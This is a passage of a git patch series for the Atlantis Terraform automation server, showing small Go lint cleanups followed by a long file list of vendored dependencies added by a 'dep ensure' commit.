correct commit, wanted %q got %q", p.HeadCommit, string(currCommit)) + log.Debug("repo was already cloned but is not at correct commit, wanted %q got %q", p.HeadCommit, currCommit) // It's okay to delete all plans now since they're out of date. log.Info("cleaning clone directory %q", cloneDir) diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go index 0f623f04a6..acb0d86791 100644 --- a/server/events/markdown_renderer.go +++ b/server/events/markdown_renderer.go @@ -154,6 +154,5 @@ var errWithLogTmpl = template.Must(template.New("").Parse(errTmplText + logTmpl) var failureTmplText = "**{{.Command}} Failed**: {{.Failure}}\n" var failureTmpl = template.Must(template.New("").Parse(failureTmplText)) var failureWithLogTmpl = template.Must(template.New("").Parse(failureTmplText + logTmpl)) -var autoplanNoProjectsTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText)) var autoplanNoProjectsWithLogTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText + logTmpl)) var logTmpl = "{{if .Verbose}}\n
Log\n

\n\n```\n{{.Log}}```\n

{{end}}\n" diff --git a/server/events/project_finder_test.go b/server/events/project_finder_test.go index 8e787a6eec..82aa84b847 100644 --- a/server/events/project_finder_test.go +++ b/server/events/project_finder_test.go @@ -47,6 +47,7 @@ func setupTmpRepos(t *testing.T) { // main.tf var err error nestedModules1, err = ioutil.TempDir("", "") + Ok(t, err) err = os.MkdirAll(filepath.Join(nestedModules1, "project1/modules"), 0700) Ok(t, err) files := []string{ diff --git a/server/events/project_operator.go b/server/events/project_operator.go index 5e7e7e43e9..b5e8184ec3 100644 --- a/server/events/project_operator.go +++ b/server/events/project_operator.go @@ -68,12 +68,12 @@ func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr var projAbsPath string if projAbsPathPtr == nil { ctx.Log.Debug("project has not yet been cloned") - repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) - if err != nil { + repoDir, cloneErr := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) + if cloneErr != nil { if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) } - return ProjectResult{Error: err} + return ProjectResult{Error: cloneErr} } projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath) ctx.Log.Debug("project successfully cloned to %q", projAbsPath) diff --git a/server/events/runtime/init_step_operator.go b/server/events/runtime/init_step_operator.go index 307c91bcfe..f483ecbbd9 100644 --- a/server/events/runtime/init_step_operator.go +++ b/server/events/runtime/init_step_operator.go @@ -11,6 +11,7 @@ type InitStepOperator struct { DefaultTFVersion *version.Version } +// nolint: unparam func (i *InitStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { tfVersion := i.DefaultTFVersion if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index abafcba940..fe11f82c72 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -616,14 +616,6 @@ workflows: } } -// Bool is a helper routine that allocates a new bool value -// to store v and returns a pointer to it. -func Bool(v bool) *bool { return &v } - -// Int is a helper routine that allocates a new int value -// to store v and returns a pointer to it. -func Int(v int) *int { return &v } - // String is a helper routine that allocates a new string value // to store v and returns a pointer to it. func String(v string) *string { return &v } diff --git a/server/events_controller.go b/server/events_controller.go index e41fe75c23..a132b094c9 100644 --- a/server/events_controller.go +++ b/server/events_controller.go @@ -165,7 +165,7 @@ func (e *EventsController) handlePullRequestEvent(w http.ResponseWriter, baseRep // whitelisted. This is because the user might be expecting Atlantis to // autoplan. For other events, we just ignore them. if eventType == OpenPullEvent { - e.commentNotWhitelisted(w, baseRepo, pull.Num) + e.commentNotWhitelisted(baseRepo, pull.Num) } e.respond(w, logging.Debug, http.StatusForbidden, "Ignoring pull request event from non-whitelisted repo") return @@ -255,7 +255,7 @@ func (e *EventsController) handleCommentEvent(w http.ResponseWriter, baseRepo mo // At this point we know it's a command we're not supposed to ignore, so now // we check if this repo is allowed to run commands in the first place. if !e.RepoWhitelist.IsWhitelisted(baseRepo.FullName, baseRepo.VCSHost.Hostname) { - e.commentNotWhitelisted(w, baseRepo, pullNum) + e.commentNotWhitelisted(baseRepo, pullNum) e.respond(w, logging.Warn, http.StatusForbidden, "Repo not whitelisted") return } @@ -328,7 +328,7 @@ func (e *EventsController) respond(w http.ResponseWriter, lvl logging.LogLevel, // commentNotWhitelisted comments on the pull request that the repo is not // whitelisted. -func (e *EventsController) commentNotWhitelisted(w http.ResponseWriter, baseRepo models.Repo, pullNum int) { +func (e *EventsController) commentNotWhitelisted(baseRepo models.Repo, pullNum int) { errMsg := "```\nError: This repo is not whitelisted for Atlantis.\n```" if err := e.VCSClient.CreateComment(baseRepo, pullNum, errMsg); err != nil { e.Logger.Err("unable to comment on pull request: %s", err) diff --git a/testing/temp_files.go b/testing/temp_files.go index 85dd68c5b1..1bfd0f15f4 100644 --- a/testing/temp_files.go +++ b/testing/temp_files.go @@ -13,5 +13,7 @@ import ( func TempDir(t *testing.T) (string, func()) { tmpDir, err := ioutil.TempDir("", "") Ok(t, err) - return tmpDir, func() { os.RemoveAll(tmpDir) } + return tmpDir, func() { + os.RemoveAll(tmpDir) // nolint: errcheck + } } From 21694c92307754a6c4bf2662ca688c2ea5005ab2 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 19 Jun 2018 21:10:07 +0100 Subject: [PATCH 31/69] Run dep ensure --- Gopkg.lock | 68 +- .../github.com/Masterminds/semver/.travis.yml | 27 + .../Masterminds/semver/CHANGELOG.md | 86 + .../github.com/Masterminds/semver/LICENSE.txt | 20 + vendor/github.com/Masterminds/semver/Makefile | 36 + .../github.com/Masterminds/semver/README.md | 165 + .../Masterminds/semver/appveyor.yml | 44 + .../Masterminds/semver/benchmark_test.go | 157 + .../Masterminds/semver/collection.go | 24 + .../Masterminds/semver/collection_test.go | 46 + .../Masterminds/semver/constraints.go | 426 + .../Masterminds/semver/constraints_test.go | 465 + vendor/github.com/Masterminds/semver/doc.go | 115 + .../github.com/Masterminds/semver/version.go | 421 + .../Masterminds/semver/version_test.go | 490 ++ .../github.com/Masterminds/sprig/.gitignore | 2 + .../github.com/Masterminds/sprig/.travis.yml | 23 + .../github.com/Masterminds/sprig/CHANGELOG.md | 153 + .../github.com/Masterminds/sprig/LICENSE.txt | 20 + vendor/github.com/Masterminds/sprig/Makefile | 13 + vendor/github.com/Masterminds/sprig/README.md | 81 + .../github.com/Masterminds/sprig/appveyor.yml | 26 + vendor/github.com/Masterminds/sprig/crypto.go | 430 + .../Masterminds/sprig/crypto_test.go | 259 + vendor/github.com/Masterminds/sprig/date.go | 76 + .../github.com/Masterminds/sprig/date_test.go | 36 + .../github.com/Masterminds/sprig/defaults.go | 84 + .../Masterminds/sprig/defaults_test.go | 129 + vendor/github.com/Masterminds/sprig/dict.go | 88 + .../github.com/Masterminds/sprig/dict_test.go | 175 + vendor/github.com/Masterminds/sprig/doc.go | 233 + .../Masterminds/sprig/docs/_config.yml | 1 + .../Masterminds/sprig/docs/conversion.md | 25 + .../Masterminds/sprig/docs/crypto.md | 133 + .../github.com/Masterminds/sprig/docs/date.md | 88 + .../Masterminds/sprig/docs/defaults.md | 113 + .../Masterminds/sprig/docs/dicts.md | 131 + .../Masterminds/sprig/docs/encoding.md | 6 + .../Masterminds/sprig/docs/flow_control.md | 11 + .../Masterminds/sprig/docs/index.md | 23 + .../Masterminds/sprig/docs/integer_slice.md | 25 + .../Masterminds/sprig/docs/lists.md | 111 + .../github.com/Masterminds/sprig/docs/math.md | 63 + .../github.com/Masterminds/sprig/docs/os.md | 24 + .../Masterminds/sprig/docs/paths.md | 43 + .../Masterminds/sprig/docs/reflection.md | 38 + .../Masterminds/sprig/docs/semver.md | 124 + .../Masterminds/sprig/docs/string_slice.md | 55 + .../Masterminds/sprig/docs/strings.md | 397 + .../github.com/Masterminds/sprig/docs/uuid.md | 9 + .../Masterminds/sprig/example_test.go | 25 + .../Masterminds/sprig/flow_control_test.go | 16 + .../github.com/Masterminds/sprig/functions.go | 281 + .../Masterminds/sprig/functions_test.go | 108 + .../github.com/Masterminds/sprig/glide.lock | 33 + .../github.com/Masterminds/sprig/glide.yaml | 15 + vendor/github.com/Masterminds/sprig/list.go | 259 + .../github.com/Masterminds/sprig/list_test.go | 157 + .../github.com/Masterminds/sprig/numeric.go | 159 + .../Masterminds/sprig/numeric_test.go | 205 + .../github.com/Masterminds/sprig/reflect.go | 28 + .../Masterminds/sprig/reflect_test.go | 73 + vendor/github.com/Masterminds/sprig/regex.go | 35 + .../Masterminds/sprig/regex_test.go | 61 + vendor/github.com/Masterminds/sprig/semver.go | 23 + .../Masterminds/sprig/semver_test.go | 31 + .../github.com/Masterminds/sprig/strings.go | 201 + .../Masterminds/sprig/strings_test.go | 227 + vendor/github.com/Sirupsen/logrus/.gitignore | 1 + vendor/github.com/Sirupsen/logrus/.travis.yml | 15 + .../github.com/Sirupsen/logrus/CHANGELOG.md | 123 + vendor/github.com/Sirupsen/logrus/LICENSE | 21 + vendor/github.com/Sirupsen/logrus/README.md | 511 ++ vendor/github.com/Sirupsen/logrus/alt_exit.go | 64 + .../Sirupsen/logrus/alt_exit_test.go | 83 + .../github.com/Sirupsen/logrus/appveyor.yml | 14 + vendor/github.com/Sirupsen/logrus/doc.go | 26 + vendor/github.com/Sirupsen/logrus/entry.go | 288 + .../github.com/Sirupsen/logrus/entry_test.go | 115 + .../Sirupsen/logrus/example_basic_test.go | 69 + .../Sirupsen/logrus/example_hook_test.go | 35 + vendor/github.com/Sirupsen/logrus/exported.go | 193 + .../github.com/Sirupsen/logrus/formatter.go | 45 + .../Sirupsen/logrus/formatter_bench_test.go | 101 + .../github.com/Sirupsen/logrus/hook_test.go | 144 + vendor/github.com/Sirupsen/logrus/hooks.go | 34 + .../Sirupsen/logrus/hooks/syslog/README.md | 39 + .../Sirupsen/logrus/hooks/syslog/syslog.go | 55 + .../logrus/hooks/syslog/syslog_test.go | 27 + .../Sirupsen/logrus/hooks/test/test.go | 95 + .../Sirupsen/logrus/hooks/test/test_test.go | 61 + .../Sirupsen/logrus/json_formatter.go | 79 + .../Sirupsen/logrus/json_formatter_test.go | 199 + vendor/github.com/Sirupsen/logrus/logger.go | 323 + .../Sirupsen/logrus/logger_bench_test.go | 61 + vendor/github.com/Sirupsen/logrus/logrus.go | 143 + .../github.com/Sirupsen/logrus/logrus_test.go | 386 + .../Sirupsen/logrus/terminal_bsd.go | 10 + .../logrus/terminal_check_appengine.go | 11 + .../logrus/terminal_check_notappengine.go | 19 + .../Sirupsen/logrus/terminal_linux.go | 14 + .../Sirupsen/logrus/text_formatter.go | 178 + .../Sirupsen/logrus/text_formatter_test.go | 141 + vendor/github.com/Sirupsen/logrus/writer.go | 62 + vendor/github.com/aokoli/goutils/.travis.yml | 18 + vendor/github.com/aokoli/goutils/CHANGELOG.md | 8 + vendor/github.com/aokoli/goutils/LICENSE.txt | 202 + vendor/github.com/aokoli/goutils/README.md | 70 + vendor/github.com/aokoli/goutils/appveyor.yml | 21 + .../aokoli/goutils/randomstringutils.go | 268 + .../aokoli/goutils/randomstringutils_test.go | 78 + .../github.com/aokoli/goutils/stringutils.go | 224 + .../aokoli/goutils/stringutils_test.go | 309 + vendor/github.com/aokoli/goutils/wordutils.go | 356 + .../aokoli/goutils/wordutils_test.go | 225 + vendor/github.com/davecgh/go-spew/.gitignore | 22 + vendor/github.com/davecgh/go-spew/.travis.yml | 14 + vendor/github.com/davecgh/go-spew/LICENSE | 15 + vendor/github.com/davecgh/go-spew/README.md | 205 + .../github.com/davecgh/go-spew/cov_report.sh | 22 + .../github.com/davecgh/go-spew/spew/bypass.go | 152 + .../davecgh/go-spew/spew/bypasssafe.go | 38 + .../github.com/davecgh/go-spew/spew/common.go | 341 + .../davecgh/go-spew/spew/common_test.go | 298 + .../github.com/davecgh/go-spew/spew/config.go | 306 + vendor/github.com/davecgh/go-spew/spew/doc.go | 211 + .../github.com/davecgh/go-spew/spew/dump.go | 509 ++ .../davecgh/go-spew/spew/dump_test.go | 1042 +++ .../davecgh/go-spew/spew/dumpcgo_test.go | 99 + .../davecgh/go-spew/spew/dumpnocgo_test.go | 26 + .../davecgh/go-spew/spew/example_test.go | 226 + .../github.com/davecgh/go-spew/spew/format.go | 419 + .../davecgh/go-spew/spew/format_test.go | 1558 ++++ .../davecgh/go-spew/spew/internal_test.go | 87 + .../go-spew/spew/internalunsafe_test.go | 102 + .../github.com/davecgh/go-spew/spew/spew.go | 148 + .../davecgh/go-spew/spew/spew_test.go | 320 + .../davecgh/go-spew/spew/testdata/dumpcgo.go | 82 + .../davecgh/go-spew/test_coverage.txt | 61 + vendor/github.com/docker/docker/.dockerignore | 4 + .../docker/docker/.github/ISSUE_TEMPLATE.md | 64 + .../docker/.github/PULL_REQUEST_TEMPLATE.md | 30 + vendor/github.com/docker/docker/.gitignore | 33 + vendor/github.com/docker/docker/.mailmap | 275 + vendor/github.com/docker/docker/AUTHORS | 1652 ++++ vendor/github.com/docker/docker/CHANGELOG.md | 3337 +++++++ .../github.com/docker/docker/CONTRIBUTING.md | 401 + vendor/github.com/docker/docker/Dockerfile | 246 + .../docker/docker/Dockerfile.aarch64 | 175 + .../github.com/docker/docker/Dockerfile.armhf | 182 + .../docker/docker/Dockerfile.ppc64le | 188 + .../github.com/docker/docker/Dockerfile.s390x | 190 + .../docker/docker/Dockerfile.simple | 73 + .../docker/docker/Dockerfile.solaris | 20 + .../docker/docker/Dockerfile.windows | 267 + vendor/github.com/docker/docker/LICENSE | 191 + vendor/github.com/docker/docker/MAINTAINERS | 376 + vendor/github.com/docker/docker/Makefile | 147 + vendor/github.com/docker/docker/NOTICE | 19 + vendor/github.com/docker/docker/README.md | 304 + vendor/github.com/docker/docker/ROADMAP.md | 118 + vendor/github.com/docker/docker/VENDORING.md | 45 + vendor/github.com/docker/docker/VERSION | 1 + vendor/github.com/docker/docker/api/README.md | 42 + vendor/github.com/docker/docker/api/common.go | 166 + .../docker/docker/api/common_test.go | 341 + .../docker/docker/api/common_unix.go | 6 + .../docker/docker/api/common_windows.go | 8 + .../docker/docker/api/errors/errors.go | 47 + .../docker/docker/api/fixtures/keyfile | 7 + .../docker/api/server/httputils/decoder.go | 16 + .../docker/api/server/httputils/errors.go | 101 + .../docker/api/server/httputils/form.go | 73 + .../docker/api/server/httputils/form_test.go | 105 + .../docker/api/server/httputils/httputils.go | 90 + .../server/httputils/httputils_write_json.go | 17 + .../httputils/httputils_write_json_go16.go | 16 + .../docker/docker/api/server/middleware.go | 24 + .../docker/api/server/middleware/cors.go | 37 + .../docker/api/server/middleware/debug.go | 76 + .../api/server/middleware/experimental.go | 29 + .../api/server/middleware/middleware.go | 13 + .../docker/api/server/middleware/version.go | 50 + .../api/server/middleware/version_test.go | 57 + .../docker/docker/api/server/profiler.go | 41 + .../docker/api/server/router/build/backend.go | 20 + .../docker/api/server/router/build/build.go | 29 + .../api/server/router/build/build_routes.go | 225 + .../api/server/router/checkpoint/backend.go | 10 + .../server/router/checkpoint/checkpoint.go | 36 + .../router/checkpoint/checkpoint_routes.go | 65 + .../api/server/router/container/backend.go | 79 + .../api/server/router/container/container.go | 77 + .../router/container/container_routes.go | 554 ++ .../api/server/router/container/copy.go | 119 + .../api/server/router/container/exec.go | 140 + .../api/server/router/container/inspect.go | 21 + .../docker/api/server/router/experimental.go | 67 + .../docker/api/server/router/image/backend.go | 45 + .../docker/api/server/router/image/image.go | 50 + .../api/server/router/image/image_routes.go | 344 + .../docker/docker/api/server/router/local.go | 96 + .../api/server/router/network/backend.go | 22 + .../api/server/router/network/filter.go | 96 + .../api/server/router/network/network.go | 44 + .../server/router/network/network_routes.go | 308 + .../api/server/router/plugin/backend.go | 25 + .../docker/api/server/router/plugin/plugin.go | 39 + .../api/server/router/plugin/plugin_routes.go | 314 + .../docker/docker/api/server/router/router.go | 19 + .../docker/api/server/router/swarm/backend.go | 36 + .../docker/api/server/router/swarm/cluster.go | 52 + .../api/server/router/swarm/cluster_routes.go | 418 + .../api/server/router/system/backend.go | 21 + .../docker/api/server/router/system/system.go | 39 + .../api/server/router/system/system_routes.go | 186 + .../api/server/router/volume/backend.go | 17 + .../docker/api/server/router/volume/volume.go | 36 + .../api/server/router/volume/volume_routes.go | 80 + .../docker/api/server/router_swapper.go | 30 + .../docker/docker/api/server/server.go | 210 + .../docker/docker/api/server/server_test.go | 46 + .../docker/docker/api/swagger-gen.yaml | 12 + .../github.com/docker/docker/api/swagger.yaml | 7785 +++++++++++++++++ .../api/templates/server/operation.gotmpl | 26 + .../docker/docker/api/types/auth.go | 22 + .../docker/api/types/backend/backend.go | 84 + .../docker/docker/api/types/blkiodev/blkio.go | 23 + .../docker/docker/api/types/client.go | 378 + .../docker/docker/api/types/configs.go | 69 + .../docker/api/types/container/config.go | 62 + .../api/types/container/container_create.go | 21 + .../api/types/container/container_update.go | 17 + .../api/types/container/container_wait.go | 17 + .../docker/api/types/container/host_config.go | 333 + .../api/types/container/hostconfig_unix.go | 81 + .../api/types/container/hostconfig_windows.go | 87 + .../docker/docker/api/types/error_response.go | 13 + .../docker/docker/api/types/events/events.go | 42 + .../docker/docker/api/types/filters/parse.go | 310 + .../docker/api/types/filters/parse_test.go | 417 + .../docker/docker/api/types/id_response.go | 13 + .../docker/docker/api/types/image_summary.go | 49 + .../docker/docker/api/types/mount/mount.go | 113 + .../docker/api/types/network/network.go | 59 + .../docker/docker/api/types/plugin.go | 189 + .../docker/docker/api/types/plugin_device.go | 25 + .../docker/docker/api/types/plugin_env.go | 25 + .../docker/api/types/plugin_interface_type.go | 21 + .../docker/docker/api/types/plugin_mount.go | 37 + .../docker/api/types/plugin_responses.go | 64 + .../docker/docker/api/types/port.go | 23 + .../api/types/reference/image_reference.go | 34 + .../types/reference/image_reference_test.go | 72 + .../docker/api/types/registry/authenticate.go | 21 + .../docker/api/types/registry/registry.go | 104 + .../docker/docker/api/types/seccomp.go | 93 + .../api/types/service_update_response.go | 12 + .../docker/docker/api/types/stats.go | 178 + .../docker/api/types/strslice/strslice.go | 30 + .../api/types/strslice/strslice_test.go | 86 + .../docker/docker/api/types/swarm/common.go | 27 + .../docker/api/types/swarm/container.go | 46 + .../docker/docker/api/types/swarm/network.go | 111 + .../docker/docker/api/types/swarm/node.go | 114 + .../docker/docker/api/types/swarm/secret.go | 31 + .../docker/docker/api/types/swarm/service.go | 105 + .../docker/docker/api/types/swarm/swarm.go | 197 + .../docker/docker/api/types/swarm/task.go | 128 + .../docker/api/types/time/duration_convert.go | 12 + .../api/types/time/duration_convert_test.go | 26 + .../docker/docker/api/types/time/timestamp.go | 124 + .../docker/api/types/time/timestamp_test.go | 93 + .../docker/docker/api/types/types.go | 549 ++ .../docker/api/types/versions/README.md | 14 + .../docker/api/types/versions/compare.go | 62 + .../docker/api/types/versions/compare_test.go | 26 + .../docker/api/types/versions/v1p19/types.go | 35 + .../docker/api/types/versions/v1p20/types.go | 40 + .../docker/docker/api/types/volume.go | 58 + .../docker/api/types/volume/volumes_create.go | 29 + .../docker/api/types/volume/volumes_list.go | 23 + .../docker/docker/builder/builder.go | 169 + .../docker/docker/builder/context.go | 260 + .../docker/docker/builder/context_test.go | 307 + .../docker/docker/builder/context_unix.go | 11 + .../docker/docker/builder/context_windows.go | 17 + .../docker/docker/builder/dockerfile/bflag.go | 176 + .../docker/builder/dockerfile/bflag_test.go | 187 + .../docker/builder/dockerfile/builder.go | 370 + .../docker/builder/dockerfile/builder_unix.go | 5 + .../builder/dockerfile/builder_windows.go | 3 + .../builder/dockerfile/command/command.go | 46 + .../docker/builder/dockerfile/dispatchers.go | 821 ++ .../builder/dockerfile/dispatchers_test.go | 517 ++ .../builder/dockerfile/dispatchers_unix.go | 27 + .../dockerfile/dispatchers_unix_test.go | 33 + .../builder/dockerfile/dispatchers_windows.go | 86 + .../dockerfile/dispatchers_windows_test.go | 40 + .../docker/builder/dockerfile/envVarTest | 116 + .../docker/builder/dockerfile/evaluator.go | 244 + .../builder/dockerfile/evaluator_test.go | 197 + .../builder/dockerfile/evaluator_unix.go | 9 + .../builder/dockerfile/evaluator_windows.go | 13 + .../docker/builder/dockerfile/internals.go | 669 ++ .../builder/dockerfile/internals_test.go | 95 + .../builder/dockerfile/internals_unix.go | 38 + .../builder/dockerfile/internals_windows.go | 66 + .../dockerfile/internals_windows_test.go | 51 + .../builder/dockerfile/parser/dumper/main.go | 36 + .../builder/dockerfile/parser/json_test.go | 61 + .../builder/dockerfile/parser/line_parsers.go | 361 + .../builder/dockerfile/parser/parser.go | 221 + .../builder/dockerfile/parser/parser_test.go | 173 + .../parser/testfile-line/Dockerfile | 35 + .../env_no_value/Dockerfile | 3 + .../shykes-nested-json/Dockerfile | 1 + .../testfiles/ADD-COPY-with-JSON/Dockerfile | 11 + .../testfiles/ADD-COPY-with-JSON/result | 10 + .../testfiles/brimstone-consuldock/Dockerfile | 26 + .../testfiles/brimstone-consuldock/result | 5 + .../brimstone-docker-consul/Dockerfile | 52 + .../testfiles/brimstone-docker-consul/result | 9 + .../testfiles/continueIndent/Dockerfile | 36 + .../parser/testfiles/continueIndent/result | 10 + .../testfiles/cpuguy83-nagios/Dockerfile | 54 + .../parser/testfiles/cpuguy83-nagios/result | 40 + .../parser/testfiles/docker/Dockerfile | 103 + .../dockerfile/parser/testfiles/docker/result | 24 + .../parser/testfiles/env/Dockerfile | 23 + .../dockerfile/parser/testfiles/env/result | 16 + .../testfiles/escape-after-comment/Dockerfile | 9 + .../testfiles/escape-after-comment/result | 3 + .../testfiles/escape-nonewline/Dockerfile | 7 + .../parser/testfiles/escape-nonewline/result | 3 + .../parser/testfiles/escape/Dockerfile | 6 + .../dockerfile/parser/testfiles/escape/result | 3 + .../parser/testfiles/escapes/Dockerfile | 14 + .../parser/testfiles/escapes/result | 6 + .../parser/testfiles/flags/Dockerfile | 10 + .../dockerfile/parser/testfiles/flags/result | 10 + .../parser/testfiles/health/Dockerfile | 10 + .../dockerfile/parser/testfiles/health/result | 9 + .../parser/testfiles/influxdb/Dockerfile | 15 + .../parser/testfiles/influxdb/result | 11 + .../Dockerfile | 1 + .../result | 1 + .../Dockerfile | 1 + .../result | 1 + .../Dockerfile | 1 + .../jeztah-invalid-json-single-quotes/result | 1 + .../Dockerfile | 1 + .../result | 1 + .../Dockerfile | 1 + .../result | 1 + .../parser/testfiles/json/Dockerfile | 8 + .../dockerfile/parser/testfiles/json/result | 8 + .../kartar-entrypoint-oddities/Dockerfile | 7 + .../kartar-entrypoint-oddities/result | 7 + .../lk4d4-the-edge-case-generator/Dockerfile | 48 + .../lk4d4-the-edge-case-generator/result | 29 + .../parser/testfiles/mail/Dockerfile | 16 + .../dockerfile/parser/testfiles/mail/result | 14 + .../testfiles/multiple-volumes/Dockerfile | 3 + .../parser/testfiles/multiple-volumes/result | 2 + .../parser/testfiles/mumble/Dockerfile | 7 + .../dockerfile/parser/testfiles/mumble/result | 4 + .../parser/testfiles/nginx/Dockerfile | 14 + .../dockerfile/parser/testfiles/nginx/result | 11 + .../parser/testfiles/tf2/Dockerfile | 23 + .../dockerfile/parser/testfiles/tf2/result | 20 + .../parser/testfiles/weechat/Dockerfile | 9 + .../parser/testfiles/weechat/result | 6 + .../parser/testfiles/znc/Dockerfile | 7 + .../dockerfile/parser/testfiles/znc/result | 5 + .../docker/builder/dockerfile/parser/utils.go | 176 + .../docker/builder/dockerfile/shell_parser.go | 329 + .../builder/dockerfile/shell_parser_test.go | 155 + .../docker/builder/dockerfile/support.go | 19 + .../docker/builder/dockerfile/support_test.go | 65 + .../docker/builder/dockerfile/utils_test.go | 50 + .../docker/builder/dockerfile/wordsTest | 25 + .../docker/docker/builder/dockerignore.go | 48 + .../builder/dockerignore/dockerignore.go | 49 + .../builder/dockerignore/dockerignore_test.go | 57 + .../docker/builder/dockerignore_test.go | 95 + .../github.com/docker/docker/builder/git.go | 28 + .../docker/docker/builder/remote.go | 157 + .../docker/docker/builder/remote_test.go | 213 + .../docker/docker/builder/tarsum.go | 158 + .../docker/docker/builder/tarsum_test.go | 265 + .../docker/docker/builder/utils_test.go | 87 + vendor/github.com/docker/docker/cli/cobra.go | 139 + .../cli/command/bundlefile/bundlefile.go | 69 + .../cli/command/bundlefile/bundlefile_test.go | 77 + .../docker/cli/command/checkpoint/cmd.go | 24 + .../docker/cli/command/checkpoint/create.go | 58 + .../docker/cli/command/checkpoint/list.go | 62 + .../docker/cli/command/checkpoint/remove.go | 44 + .../docker/docker/cli/command/cli.go | 260 + .../docker/cli/command/commands/commands.go | 91 + .../docker/cli/command/container/attach.go | 130 + .../docker/cli/command/container/cmd.go | 46 + .../docker/cli/command/container/commit.go | 76 + .../docker/docker/cli/command/container/cp.go | 303 + .../docker/cli/command/container/create.go | 218 + .../docker/cli/command/container/diff.go | 58 + .../docker/cli/command/container/exec.go | 207 + .../docker/cli/command/container/exec_test.go | 116 + .../docker/cli/command/container/export.go | 59 + .../docker/cli/command/container/hijack.go | 116 + .../docker/cli/command/container/inspect.go | 47 + .../docker/cli/command/container/kill.go | 56 + .../docker/cli/command/container/list.go | 141 + .../docker/cli/command/container/logs.go | 87 + .../docker/cli/command/container/pause.go | 49 + .../docker/cli/command/container/port.go | 78 + .../docker/cli/command/container/prune.go | 75 + .../docker/cli/command/container/ps_test.go | 118 + .../docker/cli/command/container/rename.go | 51 + .../docker/cli/command/container/restart.go | 62 + .../docker/docker/cli/command/container/rm.go | 73 + .../docker/cli/command/container/run.go | 285 + .../docker/cli/command/container/start.go | 179 + .../docker/cli/command/container/stats.go | 243 + .../cli/command/container/stats_helpers.go | 226 + .../cli/command/container/stats_unit_test.go | 20 + .../docker/cli/command/container/stop.go | 67 + .../docker/cli/command/container/top.go | 58 + .../docker/cli/command/container/tty.go | 103 + .../docker/cli/command/container/unpause.go | 50 + .../docker/cli/command/container/update.go | 163 + .../docker/cli/command/container/utils.go | 143 + .../docker/cli/command/container/wait.go | 50 + .../docker/docker/cli/command/events_utils.go | 49 + .../docker/cli/command/formatter/container.go | 235 + .../cli/command/formatter/container_test.go | 398 + .../docker/cli/command/formatter/custom.go | 51 + .../cli/command/formatter/custom_test.go | 28 + .../cli/command/formatter/disk_usage.go | 334 + .../docker/cli/command/formatter/formatter.go | 123 + .../docker/cli/command/formatter/image.go | 259 + .../cli/command/formatter/image_test.go | 333 + .../docker/cli/command/formatter/network.go | 117 + .../cli/command/formatter/network_test.go | 208 + .../docker/cli/command/formatter/reflect.go | 65 + .../cli/command/formatter/reflect_test.go | 66 + .../docker/cli/command/formatter/service.go | 322 + .../docker/cli/command/formatter/stats.go | 211 + .../cli/command/formatter/stats_test.go | 228 + .../docker/cli/command/formatter/volume.go | 121 + .../cli/command/formatter/volume_test.go | 189 + .../cli/command/idresolver/idresolver.go | 90 + .../docker/docker/cli/command/image/build.go | 477 + .../docker/docker/cli/command/image/cmd.go | 33 + .../docker/cli/command/image/history.go | 99 + .../docker/docker/cli/command/image/import.go | 88 + .../docker/cli/command/image/inspect.go | 44 + .../docker/docker/cli/command/image/list.go | 96 + .../docker/docker/cli/command/image/load.go | 77 + .../docker/docker/cli/command/image/prune.go | 92 + .../docker/docker/cli/command/image/pull.go | 84 + .../docker/docker/cli/command/image/push.go | 61 + .../docker/docker/cli/command/image/remove.go | 77 + .../docker/docker/cli/command/image/save.go | 57 + .../docker/docker/cli/command/image/tag.go | 41 + .../docker/docker/cli/command/image/trust.go | 381 + .../docker/cli/command/image/trust_test.go | 57 + .../docker/docker/cli/command/in.go | 75 + .../docker/cli/command/inspect/inspector.go | 195 + .../cli/command/inspect/inspector_test.go | 221 + .../docker/docker/cli/command/network/cmd.go | 28 + .../docker/cli/command/network/connect.go | 64 + .../docker/cli/command/network/create.go | 226 + .../docker/cli/command/network/disconnect.go | 41 + .../docker/cli/command/network/inspect.go | 45 + .../docker/docker/cli/command/network/list.go | 76 + .../docker/cli/command/network/prune.go | 73 + .../docker/cli/command/network/remove.go | 43 + .../docker/docker/cli/command/node/cmd.go | 43 + .../docker/docker/cli/command/node/demote.go | 36 + .../docker/docker/cli/command/node/inspect.go | 144 + .../docker/docker/cli/command/node/list.go | 115 + .../docker/docker/cli/command/node/opts.go | 60 + .../docker/docker/cli/command/node/promote.go | 36 + .../docker/docker/cli/command/node/ps.go | 93 + .../docker/docker/cli/command/node/remove.go | 56 + .../docker/docker/cli/command/node/update.go | 121 + .../docker/docker/cli/command/out.go | 69 + .../docker/docker/cli/command/plugin/cmd.go | 31 + .../docker/cli/command/plugin/create.go | 125 + .../docker/cli/command/plugin/disable.go | 36 + .../docker/cli/command/plugin/enable.go | 47 + .../docker/cli/command/plugin/inspect.go | 42 + .../docker/cli/command/plugin/install.go | 208 + .../docker/docker/cli/command/plugin/list.go | 63 + .../docker/docker/cli/command/plugin/push.go | 71 + .../docker/cli/command/plugin/remove.go | 55 + .../docker/docker/cli/command/plugin/set.go | 22 + .../docker/cli/command/plugin/upgrade.go | 100 + .../docker/docker/cli/command/prune/prune.go | 50 + .../docker/docker/cli/command/registry.go | 186 + .../docker/cli/command/registry/login.go | 85 + .../docker/cli/command/registry/logout.go | 77 + .../docker/cli/command/registry/search.go | 126 + .../docker/docker/cli/command/secret/cmd.go | 25 + .../docker/cli/command/secret/create.go | 79 + .../docker/cli/command/secret/inspect.go | 45 + .../docker/docker/cli/command/secret/ls.go | 68 + .../docker/cli/command/secret/remove.go | 57 + .../docker/docker/cli/command/secret/utils.go | 76 + .../docker/docker/cli/command/service/cmd.go | 